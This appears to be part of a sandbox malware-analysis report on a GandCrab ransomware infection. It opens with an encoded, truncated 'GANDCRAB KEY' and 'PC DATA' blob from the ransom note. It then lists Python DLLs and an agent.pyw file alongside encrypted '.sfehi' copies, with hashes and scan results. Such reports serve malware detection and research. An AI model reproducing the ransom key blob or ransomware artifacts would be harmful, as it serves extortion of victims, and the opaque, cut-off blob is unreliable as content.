\x00E\x00J\x00z\x005\x00g\x00x\x00e\x006\x00K\x00N\x00P\x00t\x00j\x00T\x00c\x00m\x001\x006\x00Z\x00k\x00v\x009\x00x\x00J\x00J\x00S\x000\x00v\x00f\x00F\x00o\x00R\x00s\x003\x00U\x00r\x00A\x00F\x00j\x00r\x00Q\x006\x00I\x00g\x00q\x00p\x00D\x00F\x00w\x006\x003\x00y\x00g\x00s\x00t\x00m\x000\x00k\x00i\x009\x00x\x00r\x00p\x00a\x00t\x00x\x00p\x00o\x00s\x00Y\x00r\x00q\x00m\x00t\x00Z\x000\x00h\x00T\x00O\x00U\x00d\x00h\x00B\x00Y\x00n\x00E\x00b\x00k\x00m\x00R\x00B\x007\x008\x00c\x00M\x00B\x00A\x00y\x00m\x00H\x00u\x00H\x00k\x00Z\x00C\x008\x000\x00j\x00Y\x00F\x002\x00R\x00j\x005\x00R\x00t\x00T\x00D\x00O\x00f\x00Q\x00K\x00t\x00R\x00h\x00A\x002\x00B\x00d\x00n\x00i\x00Q\x00K\x008\x00+\x00l\x00N\x006\x00y\x00K\x00c\x00I\x00R\x00e\x00L\x00e\x005\x003\x00n\x00l\x00c\x00p\x00+\x00K\x00w\x00c\x00q\x00y\x00o\x00z\x00z\x00j\x00o\x00I\x00o\x00e\x00U\x000\x00L\x00X\x00/\x00b\x00E\x00V\x00X\x00s\x00w\x00V\x00l\x00c\x008\x00L\x002\x00o\x00G\x00C\x00D\x00Y\x00o\x001\x00t\x009\x000\x00d\x00T\x00Q\x000\x00M\x00P\x00W\x00E\x00y\x00a\x00P\x00V\x00L\x009\x00a\x00d\x00Z\x00i\x00R\x00S\x00k\x00E\x00O\x00L\x00V\x00y\x00j\x00k\x00I\x00Y\x00a\x00Y\x00L\x009\x00z\x00Y\x00D\x00K\x00l\x00H\x00a\x00q\x00x\x00c\x00S\x00G\x00R\x00q\x00c\x00W\x003\x00k\x00K\x005\x00S\x00y\x00U\x00A\x00w\x00a\x00a\x00h\x00U\x00m\x00m\x00W\x00S\x00j\x00f\x00+\x00z\x001\x00j\x00n\x00o\x00h\x00z\x005\x00e\x00M\x00G\x000\x00l\x00K\x00W\x001\x00H\x00w\x00U\x00E\x00h\x001\x00U\x00N\x00O\x00m\x00U\x00q\x00f\x007\x00D\x00M\x00M\x00V\x00i\x00v\x007\x00t\x004\x00h\x00l\x00j\x00q\x00p\x00c\x00f\x00g\x00b\x00n\x00n\x00I\x00F\x00N\x00k\x006\x00d\x00X\x007\x00R\x00N\x00Y\x00F\x00m\x00F\x00g\x00A\x008\x00R\x00B\x00N\x00l\x005\x000\x00a\x00M\x00y\x007\x007\x00E\x00W\x00P\x00P\x00m\x008\x00q\x00i\x00g\x006\x00z\x002\x00h\x00D\x00X\x00V\x00+\x00N\x00N\x00N\x00h\x00G\x00i\x00g\x00A\x008\x00q\x00v\x001\x007\x00i\x00N\x00Y\x00i\x00M\x00p\x00/\x00h\x00M\x00M\x002\x00/\x00O\x00m\x000\x00V\x00U\x00P\x00+\x004\x00C\x007\x00V\x00w\x00R\x008\x00R\x009\x007\x00R\x00k\x00q\x00o\x003\x003\x00R\x002\x00j\x00n\x00y\x00P\x004\x009\x00z\x006\x00z\x00j\x00p\x00Q\x000\x00B\x00L\x00G\x00x\x00Q\x00C\x00V\x00w\x00e\x00P\x00s\x00H\x005\x00b\x00D\x00y\x00n\x00B\x00D\x00m\x00t\x001\x00D\x00B\x00p\x00p\x00Q\x00G\x00t\x00P\x00k\x00a\x00o\x00u\x00B\x00i\x003\x004\x00u\x00F\x00m\x00c\x00K\x00a\x00G\x00W\x00T\x00Z\x00z\x00B\x00r\x00Y\x00z\x00F\x00x\x00h\x00m\x001\x000\x00j\x00Y\x00Y\x00K\x00j\x00a\x00p\x006\x00y\x002\x00B\x00/\x00m\x00+\x002\x00t\x008\x00Z\x00C\x00J\x008\x00y\x00Y\x00n\x00g\x00T\x00P\x00N\x00p\x004\x00d\x00+\x00C\x00u\x002\x00L\x00F\x00F\x00R\x00o\x00S\x00C\x000\x00Q\x00r\x00X\x00/\x00d\x00D\x009\x00Y\x00B\x001\x007\x00i\x00y\x00a\x00a\x00V\x004\x003\x00S\x00q\x00p\x00M\x00L\x00J\x00F\x00b\x00J\x00p\x00U\x00C\x00j\x001\x00u\x00j\x00D\x00e\x00Q\x00f\x00E\x00y\x00y\x00W\x00G\x00f\x00v\x00K\x00Z\x00m\x00g\x00c\x00p\x00p\x008\x00l\x00z\x002\x00K\x00S\x00V\x00V\x00G\x00V\x006\x00q\x00c\x00u\x00W\x00O\x00E\x00P\x00F\x00L\x00g\x00d\x00c\x00U\x00l\x00r\x00a\x006\x00h\x00L\x00S\x00m\x00J\x00X\x007\x00a\x00u\x00O\x00E\x00U\x00f\x00D\x00g\x00o\x00b\x00Q\x006\x00w\x00i\x00r\x00Q\x00X\x00p\x00n\x00Q\x00A\x00z\x00O\x00J\x00Q\x00L\x00x\x003\x00R\x00o\x00J\x00E\x00D\x00V\x000\x00v\x003\x00E\x00j\x001\x000\x00V\x00E\x00E\x00f\x00g\x00e\x00T\x00s\x003\x00L\x00n\x00F\x00t\x00n\x00g\x00P\x00u\x00i\x00/\x00N\x00K\x00S\x00n\x00j\x00Z\x00N\x000\x00+\x00l\x002\x00n\x00n\x00/\x00P\x00P\x00N\x00E\x00g\x00u\x00B\x000\x00f\x00/\x00M\x00P\x00T\x00e\x00A\x00I\x007\x00C\x00a\x002\x005\x00l\x00a\x00I\x00H\x00B\x001\x00a\x00x\x00f\x00f\x00W\x00t\x001\x005\x00+\x005\x00k\x00Z\x004\x00X\x00n\x00q\x000\x001\x00z\x00e\x001\x00p\x00S\x00t\x00K\x00W\x00W\x007\x00F\x00o\x00u\x001\x00T\x009\x002\x009\x00t\x00+\x00o\x00f\x00D\x008\x00j\x00u\x00A\x008\x000\x00x\x00i\x00v\x00T\x00t\x00e\x00G\x00x\x00Y\x00m\x00X\x00q\x00o\x00a\x00/\x00j\x00q\x003\x009\x00a\x00L\x00l\x00F\x00y\x00y\x00O\x00N\x00f\x00/\x005\x00a\x00T\x00C\x00m\x00R\x00y\x00g\x00y\x000\x00w\x00i\x00X\x00G\x00f\x00l\x00H\x00Z\x00V\x00/\x00t\x00P\x00M\x00i\x00y\x00R\x00j\x00K\x00v\x00X\x00N\x008\x00a\x009\x004\x00w\x00A\x00L\x00i\x00s\x00Y\x00K\x00v\x00s\x00M\x00N\x00W\x00m\x004\x00/\x00P\x00A\x00u\x00L\x00L\x00i\x00Z\x00p\x00A\x00B\x00O\x00D\x00+\x00W\x00I\x003\x00l\x00w\x009\x00X\x00n\x00n\x00D\x00m\x00/\x00p\x00/\x007\x00n\x00W\x004\x00Q\x00N\x00B\x00V\x00F\x00d\x002\x000\x00n\x001\x00l\x00L\x00u\x00O\x00y\x00O\x003\x00s\x009\x00x\x00E\x00z\x00Z\x00W\x00r\x002\x00X\x00k\x00I\x00R\x00+\x00T\x00U\x00b\x00k\x005\x00c\x00a\x008\x00A\x00e\x00c\x00R\x00H\x00e\x004\x00U\x00F\x00n\x004\x00V\x00C\x00A\x005\x00d\x00x\x00n\x00m\x00K\x00r\x00n\x00H\x00c\x00n\x001\x00U\x00/\x00E\x00Z\x00b\x00Z\x00i\x00r\x00I\x00X\x00p\x00O\x007\x00J\x00u\x00q\x00P\x00l\x00c\x00Q\x00A\x00C\x00h\x00G\x00z\x00R\x00O\x00C\x00Q\x00M\x00K\x008\x00K\x00L\x00U\x00j\x00l\x004\x009\x00p\x00+\x00x\x00h\x00l\x001\x00b\x00y\x002\x00Y\x00K\x00X\x00K\x00T\x00J\x00Q\x00I\x00l\x00F\x00B\x00V\x00Z\x00D\x00S\x00J\x00q\x00H\x00J\x00H\x00E\x00y\x00B\x00O\x00M\x00P\x008\x00D\x007\x00g\x00R\x00y\x005\x00n\x000\x00t\x00o\x00X\x00h\x00h\x00q\x007\x00C\x00+\x004\x00q\x00c\x00Q\x006\x002\x00i\x00H\x00q\x00T\x00W\x00o\x00i\x00k\x00H\x00I\x00H\x00m\x00A\x00g\x00y\x00g\x00D\x00G\x00I\x00m\x00j\x00+\x00R\x00l\x00L\x005\x007\x00e\x00X\x00l\x000\x00a\x00C\x00M\x00M\x002\x00E\x002\x00e\x005\x00J\x00l\x00V\x00G\x000\x00D\x00k\x001\x00u\x00g\x00m\x00m\x00p\x00i\x00a\x00N\x00o\x00A\x00o\x00m\x00O\x001\x00M\x00y\x00Y\x00v\x00f\x00r\x00q\x00B\x00V\x003\x00R\x00V\x00P\x00O\x007\x005\x00v\x009\x00w\x007\x00p\x00Y\x00z\x00h\x00q\x00M\x00V\x00Q\x00/\x00l\x00V\x00e\x00f\x00L\x00O\x00T\x00J\x00j\x00b\x00t\x00X\x00Q\x00z\x00+\x00X\x00E\x00v\x00c\x00v\x005\x00C\x00h\x00v\x00m\x00z\x00s\x00C\x00p\x00i\x006\x00S\x009\x003\x00m\x00K\x002\x00i\x00B\x00+\x00A\x00A\x00U\x005\x00/\x00C\x00X\x00k\x00r\x00D\x00S\x00n\x00b\x00c\x00a\x00/\x000\x00k\x00W\x00/\x00N\x00v\x00Z\x00w\x00c\x000\x00l\x00S\x00I\x00e\x00Q\x00Z\x00v\x00a\x00U\x004\x00S\x00+\x005\x00h\x00B\x00i\x00S\x00b\x007\x00l\x00P\x00q\x005\x000\x00f\x007\x003\x00F\x00h\x00i\x004\x00+\x00t\x00+\x00o\x00N\x00U\x00d\x00f\x00H\x00n\x00s\x00V\x00r\x00i\x00r\x00T\x00H\x002\x00G\x00x\x00/\x00U\x00s\x00A\x00s\x00n\x00c\x00R\x009\x00k\x00G\x00N\x00B\x00h\x00N\x006\x009\x00/\x006\x009\x00N\x00l\x00N\x00P\x00S\x00b\x00e\x00A\x00q\x00k\x00l\x00X\x00V\x00S\x00R\x00G\x000\x00o\x00F\x00/\x00c\x00S\x00R\x00f\x005\x00A\x002\x008\x00A\x00+\x00g\x00i\x00S\x00U\x00g\x00c\x00j\x00x\x005\x007\x00A\x00S\x006\x00q\x00V\x00R\x00h\x00C\x00C\x00R\x009\x00b\x008\x00X\x00i\x00q\x00p\x00D\x001\x003\x00r\x00Q\x00O\x00H\x00+\x00o\x00r\x00v\x009\x00z\x005\x005\x00Z\x00c\x00+\x00R\x00I\x00j\x00z\x00t\x00l\x00i\x00h\x00f\x003\x00u\x00Q\x00C\x006\x00z\x00d\x00g\x00a\x00t\x00s\x00+\x00d\x005\x00O\x00K\x006\x00n\x00c\x00w\x00h\x00Y\x005\x00i\x009\x00C\x00q\x00z\x00q\x000\x00Y\x00h\x00q\x00E\x00q\x00J\x00p\x00u\x00P\x00Z\x00j\x00X\x00L\x00n\x00m\x00O\x00N\x004\x00l\x00n\x00n\x00R\x00v\x00S\x00u\x005\x00I\x00V\x00Y\x00O\x00v\x00Y\x00Z\x00+\x00d\x00a\x008\x00H\x00C\x00A\x00b\x00f\x000\x009\x00B\x00a\x00o\x00R\x00X\x00E\x00R\x00l\x005\x00L\x00u\x00K\x00i\x00w\x00I\x00n\x00k\x00X\x008\x008\x009\x006\x00m\x008\x00a\x00K\x00L\x006\x00F\x00y\x00e\x00B\x00u\x00/\x004\x000\x001\x00h\x002\x00T\x00L\x00Y\x00U\x00H\x00u\x006\x00a\x00f\x00v\x00O\x006\x00u\x00o\x00g\x00l\x000\x00B\x00A\x00d\x00x\x00M\x00v\x00D\x00a\x00l\x00i\x008\x00P\x00A\x00w\x00R\x000\x00x\x00A\x00Z\x004\x00C\x00t\x00h\x00e\x008\x00m\x00Y\x001\x00e\x00V\x00b\x00o\x00X\x00J\x00a\x008\x00a\x00b\x00z\x00j\x00t\x00J\x00T\x00s\x00s\x00D\x00p\x002\x008\x00c\x00C\x00M\x00V\x00w\x00a\x00K\x00O\x007\x00B\x001\x00/\x00P\x00y\x00v\x00A\x00c\x00Q\x008\x00N\x009\x00s\x00y\x00L\x00D\x00r\x00/\x00z\x00S\x00h\x00C\x00v\x00I\x005\x004\x00p\x00Z\x00K\x00K\x00I\x00d\x00q\x00e\x00X\x00W\x00K\x001\x00b\x009\x00I\x00v\x002\x00D\x00Y\x002\x00N\x002\x00R\x00F\x00A\x00j\x008\x00F\x00E\x00u\x00Y\x00r\x00S\x00V\x00w\x00u\x00F\x00h\x00Q\x008\x007\x00T\x00z\x00X\x00x\x00H\x00k\x00j\x00t\x00E\x00o\x00y\x00H\x00p\x00P\x00T\x00R\x00N\x00T\x00M\x00O\x00x\x00w\x00x\x00O\x00u\x00h\x00K\x00O\x00b\x00r\x00w\x009\x00r\x00X\x00L\x00j\x00J\x00V\x00Y\x00c\x00q\x00q\x00b\x00/\x00v\x00b\x004\x00j\x00a\x00L\x00r\x00S\x00L\x00r\x00a\x00O\x009\x007\x00g\x00G\x008\x00d\x00u\x00I\x00E\x00n\x009\x007\x00Q\x00g\x00e\x00L\x00b\x00O\x00S\x00z\x00x\x007\x00/\x003\x00h\x00S\x00h\x00h\x00B\x00b\x00Q\x003\x00z\x009\x00m\x00x\x00q\x00g\x00l\x00U\x00v\x00z\x00H\x00f\x00/\x00E\x000\x00Z\x006\x004\x00a\x00T\x00a\x00k\x00p\x000\x00E\x00W\x00R\x00U\x00R\x00O\x00d\x00h\x00n\x00Q\x00l\x00E\x00g\x00f\x007\x00H\x004\x003\x00l\x00V\x00F\x00D\x003\x00l\x00W\x00u\x00I\x00O\x00S\x001\x006\x00+\x00U\x00N\x00h\x00H\x00L\x00/\x001\x00b\x001\x00M\x00S\x00Y\x009\x00i\x00m\x00u\x00f\x005\x00O\x00a\x00h\x007\x00b\x00J\x00A\x00D\x000\x009\x00p\x00n\x006\x00v\x00A\x00C\x00o\x00H\x00y\x00g\x00k\x00y\x00b\x008\x00f\x00a\x00F\x00h\x00t\x008\x00d\x00X\x005\x00n\x009\x00b\x004\x004\x00K\x00B\x00c\x00Z\x00y\x00k\x00X\x00F\x007\x00p\x00z\x00h\x00n\x00k\x003\x00K\x00T\x00v\x00r\x00H\x00d\x00J\x00M\x00d\x00R\x00y\x00j\x00v\x00F\x006\x00k\x001\x00L\x00K\x00k\x00j\x006\x00G\x00P\x006\x00Z\x00n\x00R\x00y\x00W\x00e\x00k\x00b\x00P\x00+\x00M\x00i\x00Z\x001\x003\x00J\x00n\x00l\x00n\x003\x00o\x003\x00t\x00f\x00t\x00H\x002\x00m\x00B\x00L\x00H\x00j\x00c\x003\x002\x00O\x00u\x00b\x009\x00n\x00r\x00L\x00X\x00H\x007\x00b\x00i\x00O\x00J\x009\x00z\x00T\x00u\x00P\x009\x00S\x00p\x00T\x002\x00S\x00V\x00L\x00s\x00B\x00/\x00T\x00S\x00d\x002\x00N\x00V\x00U\x00p\x00t\x00A\x008\x00D\x00h\x00k\x00k\x00V\x00Q\x00v\x008\x004\x006\x00M\x00q\x00P\x00e\x00K\x00W\x00J\x00i\x00e\x006\x00w\x00R\x00K\x00d\x00V\x00u\x00w\x009\x00m\x00V\x00M\x003\x00Q\x00k\x00s\x00U\x000\x00x\x00K\x00d\x00t\x00R\x00Z\x001\x00a\x00F\x00t\x00q\x00R\x006\x00T\x00Q\x00e\x00e\x00c\x007\x00g\x00J\x00B\x00B\x00T\x00/\x00C\x00x\x00O\x00i\x00+\x00F\x00C\x00h\x00h\x00K\x006\x00H\x00N\x001\x00R\x006\x00Q\x00+\x00i\x00t\x00l\x00x\x006\x00x\x00q\x00J\x001\x00R\x007\x00N\x007\x00/\x00M\x00Y\x00g\x00C\x00A\x00k\x00=\x00
\x00
\x00-\x00-\x00-\x00E\x00N\x00D\x00 \x00G\x00A\x00N\x00D\x00C\x00R\x00A\x00B\x00 \x00K\x00E\x00Y\x00-\x00-\x00-\x00
\x00
\x00
\x00
\x00-\x00-\x00-\x00B\x00E\x00G\x00I\x00N\x00 \x00P\x00C\x00 \x00D\x00A\x00T\x00A\x00-\x00-\x00-\x00
\x00
\x00w\x00f\x00K\x00D\x006\x00i\x00u\x00d\x00u\x00m\x00B\x00k\x00m\x00p\x00L\x008\x00I\x00R\x00r\x004\x00U\x007\x00O\x00x\x00B\x00l\x00a\x00g\x00O\x00W\x00n\x00t\x00i\x00D\x00x\x00w\x00O\x00q\x00f\x001\x009\x001\x00Y\x00n\x00v\x00O\x00e\x00W\x00P\x00x\x005\x00O\x00Y\x00f\x00x\x00d\x001\x005\x00Z\x00e\x00T\x00p\x00l\x00R\x00y\x00X\x00Z\x00y\x007\x00m\x00B\x00W\x000\x007\x00e\x00h\x00T\x00A\x00y\x00H\x004\x00x\x005\x00P\x00B\x00L\x00z\x00z\x00p\x009\x00M\x00q\x007\x004\x00D\x006\x00G\x000\x00G\x00X\x00D\x00C\x00r\x00i\x00M\x00p\x00J\x002\x008\x008\x00/\x00F\x00K\x00v\x00/\x00a\x00m\x00F\x006\x00o\x00b\x00p\x00A\x00e\x00L\x00p\x00e\x00j\x005\x00f\x00x\x00w\x002\x00X\x003\x00x\x00A\x00Z\x00K\x00u\x00i\x00p\x00u\x00h\x00f\x000\x00T\x00/\x00A\x00q\x008\x00A\x00m\x00L\x00Z\x000\x00O\x00O\x00q\x00X\x004\x00b\x00n\x00a\x00b\x00V\x00c\x00k\x00N\x003\x00Q\x00y\x00b\x00Y\x00a\x00W\x005\x00s\x00C\x00J\x00Y\x00b\x00t\x00Y\x00D\x00K\x00S\x00R\x00x\x00s\x00Q\x00p\x00K\x00Y\x004\x00m\x002\x009\x00e\x00A\x00X\x00V\x00K\x001\x00Z\x00E\x00Z\x00V\x00s\x00Q\x00O\x00N\x00u\x00U\x00H\x00c\x00K\x00C\x00J\x00J\x002\x00P\x00+\x00M\x00K\x000\x00O\x00x\x00M\x00K\x00k\x00P\x00x\x00Y\x00o\x00A\x00L\x00G\x00m\x00T\x00A\x00p\x00x\x00S\x00m\x00t\x00A\x00o\x00T\x003\x00Z\x006\x00P\x006\x00Q\x00/\x00G\x00f\x00q\x00U\x001\x00o\x00d\x00z\x00t\x00D\x00b\x003\x00j\x00c\x00B\x00A\x00E\x00n\x00g\x00q\x00l\x004\x00J\x00n\x00R\x00N\x000\x00/\x00C\x00A\x004\x00x\x00e\x00g\x007\x00T\x00D\x00M\x00w\x00r\x00p\x003\x001\x00m\x00S\x00m\x00j\x00F\x00Y\x00A\x00/\x00+\x00k\x00e\x00I\x00t\x00P\x009\x00j\x00g\x00q\x00d\x00e\x00n\x009\x00r\x00q\x00s\x005\x00/\x00t\x00i\x00o\x00b\x00E\x00j\x00k\x00R\x00b\x00B\x00o\x00+\x00L\x007\x00/\x00z\x00s\x002\x00f\x00u\x00t\x00/\x00G\x00o\x009\x00Y\x00Y\x00V\x00r\x00V\x00B\x00n\x00X\x00t\x00/\x00h\x00H\x00U\x00E\x00Y\x00o\x00b\x009\x00C\x00c\x00X\x004\x00t\x00C\x004\x00a\x00q\x00b\x00l\x00Y\x008\x00N\x00y\x00Y\x00Y\x00y\x00q\x002\x00S\x002\x00i\x00y\x00J\x00Q\x00e\x00T\x00X\x00k\x00q\x00N\x00l\x00P\x00r\x00J\x00N\x00Y\x00J\x00r\x00p\x00E\x00b\x00w\x00N\x00g\x00o\x00c\x00h\x00O\x00x\x00n\x00M\x00c\x00+\x00f\x00+\x00 <truncated>
File name agent.pyw
Associated Filenames
C:\agent.pyw
File Size 6168 bytes
File Type data
MD5 4d8e77eab1149c583ef85ba581e24bee
SHA1 d01640ea92b66dc0846942c2eee8befb05805dbf
SHA256 44d61a34a386aa8dc6ee43f530b0eaa60ffc470f644642df2a29c324959693f8
CRC32 890B9243
Ssdeep 96:SZx3cyOxS1t6Qdgj6SgC0ZShaBTboERph92YIh1F8CxoIVAA1Y8MHhzq1tL3:IxMQKQdgjLGShcRRGh1+COIVFS8tl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name agent.pyw.sfehi
Associated Filenames
C:\agent.pyw.sfehi
File Size 6708 bytes
File Type data
MD5 fd9cda099d9eda20dbf6700491960487
SHA1 3218b60e558422e22629cd975dd4154312631bb3
SHA256 9a40a95ca3c581a65decfa38236540ac45560806b83e49aed71ffd470546b7dc
CRC32 34E93FEC
Ssdeep 96:SZx3cyOxS1t6Qdgj6SgC0ZShaBTboERph92YIh1F8CxoIVAA1Y8MHhzq1tLVRNXI:IxMQKQdgjLGShcRRGh1+COIVFS8tk1
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name bz2.pyd
Associated Filenames
C:\Python27\DLLs\bz2.pyd
File Size 68608 bytes
File Type data
MD5 92d84d26ac3f7626eb7dcab1931785fc
SHA1 d272c9dfe39773d9dd22540b4e9a2375e2c46ac6
SHA256 bbac10fdba52dff4c363d84c8af876fab4670509d3551898b0f3865ca0795650
CRC32 E0E0569F
Ssdeep 1536:7QV/EdhFLo9z06swgb8+C7xWCxycSlBnsIRozmo6G04dZI6:U/HRHxWCxycQ20G04I6
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name bz2.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\bz2.pyd.sfehi
File Size 69148 bytes
File Type data
MD5 89c22f35e938616efbe43d9d223368b6
SHA1 510838eab5d349c2df5a85c09cb1b01534ef4606
SHA256 a22d45171faf6f1df2d414a2253e447a57ddb7c493124893663fc6d1e23e3272
CRC32 16A910BC
Ssdeep 1536:7QV/EdhFLo9z06swgb8+C7xWCxycSlBnsIRozmo6G04dZIz:U/HRHxWCxycQ20G04Iz
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name unicodedata.pyd
Associated Filenames
C:\Python27\DLLs\unicodedata.pyd
File Size 686080 bytes
File Type data
MD5 5ede45c6a1b9240aa937cd0e58bad803
SHA1 d13ce3dd17b69861983c0236ce8c780e609449c0
SHA256 391b0f8d61f79ad804f7d3e4109f9cf3ecb5a77f1018d54106f373113de6fdd1
CRC32 59377196
Ssdeep 12288:bQO3jxeH0Oku8M4Rhoikdn9I/i6Shqe1CJCdWkFF85T9KxIPUH2iVGuIjjfDZvsX:bTjGkux4RhotRGyhbCFkFF8TMHSvfVgb
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name unicodedata.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\unicodedata.pyd.sfehi
File Size 686620 bytes
File Type data
MD5 2bbfb74597e39236797519c0d4e61f39
SHA1 0717f29ca77b8234476e89832b89512a5b05fc42
SHA256 fb182f639aebb1b3ed21447d6e64cc3e95868c9e79a1f2335838895698074af8
CRC32 89DB96F8
Ssdeep 12288:bQO3jxeH0Oku8M4Rhoikdn9I/i6Shqe1CJCdWkFF85T9KxIPUH2iVGuIjjfDZvsy:bTjGkux4RhotRGyhbCFkFF8TMHSvfVgm
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name winsound.pyd
Associated Filenames
C:\Python27\DLLs\winsound.pyd
File Size 9216 bytes
File Type data
MD5 640d15092ca0e280e2cdc7db58a42b78
SHA1 cfa2ba39c0abf2e2e986d964879c8ecaaea2e53d
SHA256 8fdb974abce6ab7cb764bf06bb0052ffa2757c04e87af75600167f0aea28f944
CRC32 92D7887A
Ssdeep 192:oYevd+3C1YQmeoFgzQRaqCr3n1QXEaQDTXwDeHPYLCzTbW1O:ozYCnmeoFgzCGnGXEaQQkYmPbW1O
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name winsound.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\winsound.pyd.sfehi
File Size 9756 bytes
File Type data
MD5 2ddc3672b484c9b12f9046b964ce630b
SHA1 a6f5e8d0881d6858369ce14dafb7d86a025c8020
SHA256 4c8ce224df5c42a9dae40cdd705ab10dfdafd66ae9c7b47bd23837d07d7ad27b
CRC32 29EF1A3F
Ssdeep 192:oYevd+3C1YQmeoFgzQRaqCr3n1QXEaQDTXwDeHPYLCzTbW1AZ0w:ozYCnmeoFgzCGnGXEaQQkYmPbW1AZl
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _bsddb.pyd
Associated Filenames
C:\Python27\DLLs\_bsddb.pyd
File Size 1012224 bytes
File Type data
MD5 20d8a3e49c3c913fdd77222567b93d16
SHA1 9f2b803328970630ad1632c3384c15f5b021d37b
SHA256 cd6ac56665a2c3c4f13396c880e531bf0076a09f8a3f1e8258dcc2754ca60bdd
CRC32 313BF864
Ssdeep 24576:CJCKOu837qBdIpOKi7nWPsqO244N81PyqumQYahEA:gtOueWBwOjWFOSc7A
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _bsddb.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_bsddb.pyd.sfehi
File Size 1012764 bytes
File Type data
MD5 fbd5f46f0bf5d6ce5091a8e5dada5e27
SHA1 05783bef9962268e043f82cb78469779c3170440
SHA256 29143e7c51d10253f71cfd05c548a95743c4cdfbdaa1467e926001bdc0fc4dc3
CRC32 8EA05E0D
Ssdeep 24576:CJCKOu837qBdIpOKi7nWPsqO244N81PyqumQYahEJ:gtOueWBwOjWFOSc7J
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _ctypes_test.pyd
Associated Filenames
C:\Python27\DLLs\_ctypes_test.pyd
File Size 15872 bytes
File Type data
MD5 74f265aac9966686e0750ae635355eb0
SHA1 4a8339908ecb8b27707d1f897c734fc93ef4950f
SHA256 69f29d5b41c966ce0574167c0a7200d57d2729975f2d7015dc461e6c0f650624
CRC32 331FF533
Ssdeep 384:Vz0iT9Z5efm1+xTpKQ1FWlDvKv7ZyJuk/jZ/jW7/dTo:x089ZIlDG2v7Zquk/pjW76
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _ctypes_test.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_ctypes_test.pyd.sfehi
File Size 16412 bytes
File Type data
MD5 1bb1a623f40721ee3f9629a644f19be9
SHA1 f8dfbf2c53f3f403c6e0da85f472544d27c37b69
SHA256 c81146de0ee0795e893970984a0b8486dc8b4e6970a202d2fd32ecc7f4fd77f1
CRC32 0D5F761D
Ssdeep 384:Vz0iT9Z5efm1+xTpKQ1FWlDvKv7ZyJuk/jZ/jW7/dTft:x089ZIlDG2v7Zquk/pjW7pt
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _elementtree.pyd
Associated Filenames
C:\Python27\DLLs\_elementtree.pyd
File Size 128512 bytes
File Type data
MD5 c2ce0dbf7344fb1e4d1e36b70dbcba81
SHA1 273cfff73980b357fbd5016efaeaa2b2897c8a98
SHA256 b3f81f2fc44171ff637dbd858c092adae649a90221464f6f7b66fbebeeecd4f1
CRC32 5CDB84F2
Ssdeep 3072:FwxdWR+77x0cTW0FwH9VNRZmOiR7HMYunUL88bKP:SxL77xPTW0SHDNRZOOP8g
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _elementtree.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_elementtree.pyd.sfehi
File Size 129052 bytes
File Type data
MD5 eb39250b5c32db3e0ef1db638e7b950c
SHA1 fd8b0bfedf443edbbf4673fbf98b758fd63c7d70
SHA256 7f326fb87efd4623459cff94631e94831e500b4722d174bd8747da0158a9800c
CRC32 6ACD4559
Ssdeep 3072:FwxdWR+77x0cTW0FwH9VNRZmOiR7HMYunUL88bKF:SxL77xPTW0SHDNRZOOP8G
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _msi.pyd
Associated Filenames
C:\Python27\DLLs\_msi.pyd
File Size 48128 bytes
File Type data
MD5 8135d8ec6983502f6bfba4f1b231f0d0
SHA1 ad99c1774b51483deae16ee292039bca04e7cbd9
SHA256 e3f5f737739c64c248805be0aa4f9df37328087237b55680e61d2b4499d95f87
CRC32 28157ED0
Ssdeep 768:07VuD6xlvWAt/SQQZKD0PgOJMK+qcdZ+U7eaEC9iaesMlBeXtzbwxx6q/d1Efatn:MfOAtMZK2vcysfEHTlMXFbXq11EytN6u
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _msi.pyd.sfehi
Associated Filenames
C:\Python27\DLLs\_msi.pyd.sfehi
File Size 48668 bytes
File Type data
MD5 a819bc49889c926d157bd9233c9d7b7c
SHA1 c29bf07f30771925291830029660ab8a2799e863
SHA256 49c56d82f36d8725be760aae2a91f334433752bdc65e880b7a6996967f535c82
CRC32 8A60CDA1
Ssdeep 768:07VuD6xlvWAt/SQQZKD0PgOJMK+qcdZ+U7eaEC9iaesMlBeXtzbwxx6q/d1EfatQ:MfOAtMZK2vcysfEHTlMXFbXq11EytN6R
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name _multiprocessing.pyd
Associated Filenames
C:\Python27\DLLs\_multiprocessing.pyd
File Size 27136 bytes
File Type data
MD5 2fd0712ce1d25c9567b33997a8b72e39
SHA1 0191fce384692dc567f4327d11aa98704fd5e753
SHA256 339f58a802d4c05b1626c5007d2e9f5a16bf0504f813b1467d7ccdea7e004cd1
CRC32 593D2418
Ssdeep 768:fVuBUtfzhN0Vjgp77ErlCjI/JEftnTroDy:f4HgpkB2lJ
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
